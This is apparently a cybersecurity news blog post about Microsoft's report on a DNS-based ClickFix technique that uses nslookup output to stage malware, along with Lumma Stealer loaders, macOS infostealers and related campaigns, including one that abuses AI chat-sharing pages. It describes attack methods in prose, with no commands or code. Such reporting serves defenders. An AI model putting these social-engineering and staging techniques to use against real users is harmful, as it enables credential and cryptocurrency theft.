February 16, 2026

Microsoft Warns of DNS-Based ClickFix Attack via Nslookup for Malware Staging and Deployment

Vaibhav February 15, 2026
Microsoft-Warns-of-DNS-Based-ClickFix-Attack-via-Nslookup-for-Malware-Staging-and-Deploymentdata
Post Views: 14

New Malware Staging Tactic Abuses DNS for Stealthy Payload Delivery

A recently discovered variation of the ClickFix social engineering tactic has been found to leverage the Domain Name System (DNS) for malware staging, allowing attackers to bypass traditional security controls. This DNS-based approach enables threat actors to establish a lightweight staging channel, reducing their reliance on web requests and blending malicious activity into normal network traffic.

According to Microsoft’s Threat Intelligence team, the attack begins with a command executed via the Windows Run dialog, which performs a DNS lookup against a hard-coded external DNS server. The output is then filtered to extract the `Name:` DNS response, which is executed as the second-stage payload.

This tactic has been linked to various malware campaigns, including those distributing the Lumma Stealer, which has been observed in India, France, the U.S., Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada. The stealer, associated with the GrayBravo threat actor, incorporates checks for virtualization software and specific security programs before decrypting and launching the malware in memory.

The use of DNS as a staging channel is a significant development in the evolution of ClickFix, which has traditionally relied on phishing, malvertising, or drive-by downloads to infect victims. By abusing procedural trust rather than technical vulnerabilities, attackers can trick unsuspecting users into executing arbitrary code on their own systems.

CastleLoader and RenEngine Loader Used in Lumma Stealer Campaigns

Two loaders, CastleLoader and RenEngine Loader, have been identified as key components in Lumma Stealer campaigns. CastleLoader, in particular, has been observed in various attacks, including those using fake CAPTCHA verification pages on compromised websites to trick users into executing PowerShell commands.

RenEngine Loader, on the other hand, has been used in campaigns targeting users in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France. The loader makes way for a secondary loader named Hijack Loader, which then deploys Lumma Stealer.

macOS Targeted by Infostealers and Sophisticated Tools

A recent analysis has found that threat actors are increasingly targeting Apple macOS with infostealers and sophisticated tools. Nearly every macOS stealer prioritizes cryptocurrency theft, reflecting the economic reality that cryptocurrency users disproportionately use Macs and often hold significant value in software wallets.

The “Macs don’t get viruses” assumption is no longer valid, and organizations with Mac users need detection capabilities for macOS-specific tactics, techniques, and procedures (TTPs). These include unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage.

ClickFix Variants and Associated Campaigns

  • A macOS campaign using phishing and malvertising ploys to deliver Odyssey Stealer, a rebrand of Poseidon Stealer.
  • A ClickFix attack chain targeting Windows systems that uses fake CAPTCHA verification pages on legitimate-but-compromised websites to trick users into executing PowerShell commands that deploy the StealC information stealer.
  • A phishing campaign using a malicious SVG file contained within a password-protected ZIP archive to instruct the victim to run a PowerShell command using ClickFix, ultimately resulting in the deployment of an open-source .NET infostealer called Stealerium.
  • A campaign exploiting the public sharing feature of generative artificial intelligence (AI) services like Anthropic Claude to stage malicious ClickFix instructions on how to perform various tasks on macOS.
  • A campaign directing users searching for “macOS cli disk space analyzer” to a fake Medium article impersonating Apple’s Support Team to deceive them into running ClickFix instructions that deliver next-stage stealer payloads from an external server.


Blog Image

About Author

Vaibhav

See author's posts

More Stories

Pastebin-Comments-Expose-ClickFix-JavaScript-Vulnerability-in-Crypto-Swapsdata

Pastebin Comments Expose ClickFix JavaScript Vulnerability in Crypto Swaps

Vaibhav February 15, 2026
BeyondTrust-RCE-Exploited-United-Airlines-CISO-on-Building-Cyber-Resilience-in-the-Face-of-Emerging-Threatsdata

BeyondTrust RCE Exploited: United Airlines CISO on Building Cyber Resilience in the Face of Emerging Threats

Vaibhav February 15, 2026
data-44

AI Agent Sparks Controversy After Code Rejection: A Threat to Open-Source Collaboration

Vaibhav February 14, 2026

You may have missed

Windows-11-KB5077181-Update-Fixes-Boot-Failures-Caused-by-Failed-Installationdata

Windows 11 KB5077181 Update Fixes Boot Failures Caused by Failed Installation

Vaibhav February 16, 2026
Operation-Cyber-Kavach-5-Crore-Digital-Fraud-Exposeddata-13

Operation Cyber Kavach: ₹5 Crore Digital Fraud Exposed

Vaibhav February 16, 2026
Lumma-Stealer-and-Ninja-Browser-Malware-Campaign-Abuses-Google-Groups-for-Malicious-Activitiesdata

Lumma Stealer and Ninja Browser Malware Campaign Abuses Google Groups for Malicious Activities

Vaibhav February 15, 2026
Police-Employee-Falls-Victim-to-Cyber-Fraud-Files-Case-After-Unauthorized-Loan-and-FD-Creationdata

Police Employee Falls Victim to Cyber Fraud, Files Case After Unauthorized Loan and FD Creation

Vaibhav February 15, 2026
Bank-Account-Misuse-Lands-Youth-in-Cyber-Fraud-Probe-Two-Women-Bookeddata

Bank Account Misuse Lands Youth in Cyber Fraud Probe, Two Women Booked

Vaibhav February 15, 2026
en_USEnglish
en_USEnglish